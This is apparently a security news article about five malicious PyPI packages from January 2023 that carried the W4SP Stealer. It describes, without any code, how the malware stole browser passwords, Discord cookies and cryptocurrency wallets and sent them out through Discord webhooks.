Five malicious packages discovered on the Python Package Index (PyPI) have been stealing sensitive information such as passwords, Discord authentication cookies, and cryptocurrency wallets from unsuspecting developers.
PyPI is a hub for packages developed in Python, boasting a collection of 200,000 packages, allowing developers to easily find what they need for their projects, saving time and effort.
Between January 27th and 29th, 2023, an malicious actor uploaded five packages containing the W4SP Stealer malware to PyPI. Despite being removed, the packages had already been downloaded by hundreds of developers. The following is a list of the five packages and their number of downloads:
3m-promo-gen-api – 136 downloads; Ai-Solver-gen – 132 downloads; hypixel-coins – 116 downloads; httpxrequesterv2 – 128 downloads; httpxrequester – 134 downloads
Following the initial upload of malicious packages on PyPI, a large number of downloads were recorded in just a few days, encouraging these cybercriminals to attempt to upload the same code through new packages and accounts once they are banned.
Stealing Passwords Security experts at Fortinet uncovered the packages and found that upon installation, they attempted to steal passwords saved in web browsers, cookies, and cryptocurrency wallets.
Although Fortinet did not specify the type of information-stealing malware, it was identified by BleepingComputer as W4SP Stealer, which has become a frequent occurrence in packages on PyPI.
The malware starts by stealing data from web browsers such as Google Chrome, Opera, Brave Browser, Yandex Browser, and Microsoft Edge.
It then moves on to steal authentication cookies from Discord, Discord PTB, Discord Canary, and the LightCord client.
Finally, the malware will attempt to take control of the Atomic Wallet and Exodus cryptocurrency wallets, as well as cookies for The Nations Glory online game.
The ‘GatherAll’ function (Fortinet)
Moreover, the malware aims to access a compilation of websites with the purpose of gathering confidential user information that can aid its operator in pilfering accounts.
List of sites targeted by the malware (Fortinet)
The W4SP Stealer malware collects all the information it can find on an infected machine, then uploads the stolen data to the threat actor’s server through a Discord webhook. Discord webhooks are a feature that allows sending messages with attachments to a Discord server and have become a common tool for cybercriminals to steal files, Discord tokens, and other sensitive information.
According to Fortinet, the presence of functions designed to search for specific keywords, including banking, passwords, PayPal, cryptocurrency, and multi-factor authentication files, was observed in the malware. If found, these files are attempted to be stolen through the “transfer.sh” file transfer service.
The presence of some keywords in French, highlights that the threat actor may be from France.
The increasing trend of malware distribution through package repositories like PyPi and NPM highlights the need for developers to thoroughly examine the code in packages before integrating them into their projects. If any obfuscated code or unusual behavior is detected, it should be reported to the repository and not used.